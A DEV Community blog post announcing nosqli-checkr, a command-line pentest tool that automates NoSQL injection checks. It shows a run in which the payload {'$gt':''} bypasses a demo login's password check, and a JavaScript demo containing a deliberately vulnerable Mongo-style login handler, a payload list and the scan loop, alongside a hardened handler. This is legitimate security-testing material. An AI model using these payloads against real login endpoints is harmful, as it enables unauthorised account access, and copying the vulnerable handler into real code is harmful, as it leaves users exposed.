DEV Community

Igor Souza Martins

Making easier a NoSQLi pentest

Hello, everyone!

Today I've created a project that automates NoSQLi pentesting. This is only the first version, and I'm asking for help with it.

If you are interested in helping a small project grow into a large one and making life easier for us "security guys", please open issues or send a PR.

So, how does this project work?

Given some details about a request (URL, method, body, headers), the "exploit" checks whether the chosen request parameters can be exploited with a set of NoSQLi payloads: it substitutes each payload into the parameter, sends the request, and compares the response with the error message you told it to expect. A response that differs from that error message is reported as a hit.

Example: exploiting a login API that takes a POST request with a JSON body containing user and pass:

[igor.martins automated]$ nosqli-checkr scan --host="https://nosql-checkr-test.herokuapp.com/api/v1/login" --data='{ "user": "wubba", "pass": "" }' --method="post" --params="pass" --error-message='{"success":false,"result":"user/pass not found"}'


 ███╗   ██╗  ██████╗  ███████╗  ██████╗  ██╗      ██╗      ██████╗ ██╗  ██╗ ███████╗  ██████╗ ██╗  ██╗ ██████╗  
 ████╗  ██║ ██╔═══██╗ ██╔════╝ ██╔═══██╗ ██║      ██║     ██╔════╝ ██║  ██║ ██╔════╝ ██╔════╝ ██║ ██╔╝ ██╔══██╗ 
 ██╔██╗ ██║ ██║   ██║ ███████╗ ██║   ██║ ██║      ██║     ██║      ███████║ █████╗   ██║      █████╔╝  ██████╔╝ 
 ██║╚██╗██║ ██║   ██║ ╚════██║ ██║▄▄ ██║ ██║      ██║     ██║      ██╔══██║ ██╔══╝   ██║      ██╔═██╗  ██╔══██╗ 
 ██║ ╚████║ ╚██████╔╝ ███████║ ╚██████╔╝ ███████╗ ██║     ╚██████╗ ██║  ██║ ███████╗ ╚██████╗ ██║  ██╗ ██║  ██║ 
 ╚═╝  ╚═══╝  ╚═════╝  ╚══════╝  ╚══▀▀═╝  ╚══════╝ ╚═╝      ╚═════╝ ╚═╝  ╚═╝ ╚══════╝  ╚═════╝ ╚═╝  ╚═╝ ╚═╝  ╚═╝ 


✔ Request finished
✔ Response analyzed
✔ https://nosql-checkr-test.herokuapp.com/api/v1/login is vulnerable

ℹ Payload: {"$gt":""}
ℹ Evil data 😈: {"user":"wubba","pass":{"$gt":""}}
ℹ Data stoled:
{
    "success": true,
    "result": {
        "user": "wubba",
        "_id": "hVFQzFwVlMwCYFBT"
    }
}

The "exploit" tests the pass parameter and finds the payload {"$gt":""}, which triggers the NoSQL injection flaw: the application puts the JSON value straight into its MongoDB query, so pass becomes the operator condition { "$gt": "" } (which matches any non-empty string) instead of a literal password, and the lookup for user wubba succeeds without the password. The tool calls the endpoint vulnerable because the response no longer equals the configured error message, so confirm the hit by hand before reporting it.
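As an added example (not nosqli-checkr's code, and not the test API's code), here is the scan logic described above reproduced in JavaScript against an in-memory stand-in for a Mongo-backed login route, beside a hardened variant of the same route. The USERS collection, the PAYLOADS list, the two handlers and the fieldMatches helper are all constructed for this demo; fieldMatches implements only the handful of MongoDB operator semantics needed to show why {"$gt":""} bypasses the password check.

```javascript
// Added example, not part of nosqli-checkr: a toy Mongo-style login route,
// its hardened version, and the payload-substitution scan loop a NoSQLi
// checker runs against it. All data and handlers below are constructed.

// Minimal subset of MongoDB query-operator semantics (assumption: enough of
// $gt/$ne/$regex to reproduce the bypass; a real driver supports far more).
function fieldMatches(stored, cond) {
  if (cond === null || typeof cond !== "object") return stored === cond; // plain equality
  return Object.entries(cond).every(([op, v]) => {
    switch (op) {
      case "$gt": return stored > v;                    // any non-empty string > ""
      case "$ne": return stored !== v;
      case "$regex": return new RegExp(v).test(String(stored));
      default: return false;                            // unknown operator: no match
    }
  });
}

// Constructed stand-in for db.users; the _id mirrors the run shown above.
const USERS = [
  { _id: "hVFQzFwVlMwCYFBT", user: "wubba", pass: "lubba-dub-dub" },
  { _id: "Rk9jYXRlc3RpbmcA", user: "rick", pass: "portal-gun" },
];

function findOne(query) {
  return USERS.find((doc) =>
    Object.entries(query).every(([k, cond]) => fieldMatches(doc[k], cond))) || null;
}

const NOT_FOUND = { success: false, result: "user/pass not found" };

// Vulnerable handler: the parsed JSON body goes straight into the query, so
// the client can send an operator object such as {"$gt": ""} instead of a string.
function vulnerableLogin(body) {
  const doc = findOne({ user: body.user, pass: body.pass });
  return doc ? { success: true, result: { user: doc.user, _id: doc._id } } : NOT_FOUND;
}

// Hardened handler: refuse anything that is not a plain string before it
// reaches the query, so operator objects are never interpreted.
function hardenedLogin(body) {
  if (typeof body.user !== "string" || typeof body.pass !== "string") return NOT_FOUND;
  return vulnerableLogin(body);
}

// Payloads the checker tries; the first is the one reported in the run above.
const PAYLOADS = [{ $gt: "" }, { $ne: "" }, { $regex: ".*" }];

// Scan loop: for each target param, substitute each payload, "send" the
// request to the handler, and flag the param when the response no longer
// equals the error message given on the command line (--error-message).
function scan(handler, baseData, params, errorMessage) {
  const findings = [];
  for (const param of params) {
    for (const payload of PAYLOADS) {
      const evil = { ...baseData, [param]: payload };
      const response = handler(evil);
      if (JSON.stringify(response) !== errorMessage) {
        findings.push({ param, payload, evil, response });
        break; // one working payload per param is enough to report
      }
    }
  }
  return findings;
}

// Usage mirroring the CLI run above.
const BASE = { user: "wubba", pass: "" };
const ERROR_MESSAGE = '{"success":false,"result":"user/pass not found"}';
console.log(JSON.stringify(scan(vulnerableLogin, BASE, ["pass"], ERROR_MESSAGE), null, 2));
console.log("findings against hardened route:",
  scan(hardenedLogin, BASE, ["pass"], ERROR_MESSAGE).length);
```

Against vulnerableLogin the scan reports pass with payload {"$gt":""} and the same success response shape as the run above; against hardenedLogin it reports nothing, because the type check rejects any non-string credential before the query is built. The same type check (or schema validation of the request body) is the fix to recommend when such a hit is confirmed.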

Parameters

  • -h or --host: Route URL. Ex: https://nosql-checkr-test.herokuapp.com/api/v1/login
  • -hr or --headers: Request headers. Ex: token:val or token:val;token2:val2
  • -d or --data: Request data. Ex: { "user": "wubba", "pass": "" }
  • -m or --method: Request method. Ex: post or POST
  • -p or --params: Request params which will be exploited. Ex: pass or user,pass
  • -e or --error-message: The default error message of the request. Ex: {"success":false,"result":"user/pass not found"}

Github Project